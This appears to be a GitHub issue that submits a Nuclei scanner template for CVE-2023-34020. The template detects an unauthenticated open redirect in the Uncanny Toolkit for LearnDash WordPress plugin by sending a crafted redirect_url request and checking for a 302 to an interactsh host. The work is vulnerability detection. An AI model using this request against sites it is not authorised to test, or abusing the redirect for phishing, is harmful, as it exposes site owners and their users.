### ISSUE TITLE
CVE-2023-34020.yaml

### ISSUE THREAD

**Issue by DoubleTakes** [projectdiscovery/nuclei-templates#8541]
### Template Information:

Template for the **CVE-2023-34020** where **WordPress Uncanny Toolkit for LearnDash Plugin <= 3.6.4.3** is vulnerable to **Open Redirection**.

**Analysis and PoC:** https://mikadmin.fr/blog/cve-2023-34020-unauthenticated-open-redirect/

**Patchstack:** https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability

### Nuclei Template:

```yaml
id: CVE-2023-34020
info:
  name: Open Redirection vulnerability in WordPress Uncanny Toolkit for LearnDash Plugin (CVE-2023-34020)
  author: DoubleTake (https://twitter.com/LeDoubleTake)
  severity: low
  reference: https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability
  tags: cve,cve2023,wordpress

http:
  - method: GET
    path:
      - "{{BaseURL}}/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: https://{{interactsh-url}}"
          - "location: https://{{interactsh-url}}"

      - type: status
        status:
          - 302
```

### Proof of match:
![poc cve 2023 34020](https://github.com/projectdiscovery/nuclei-templates/assets/69987679/73174087-80d2-44bc-b11e-02b639dff999)
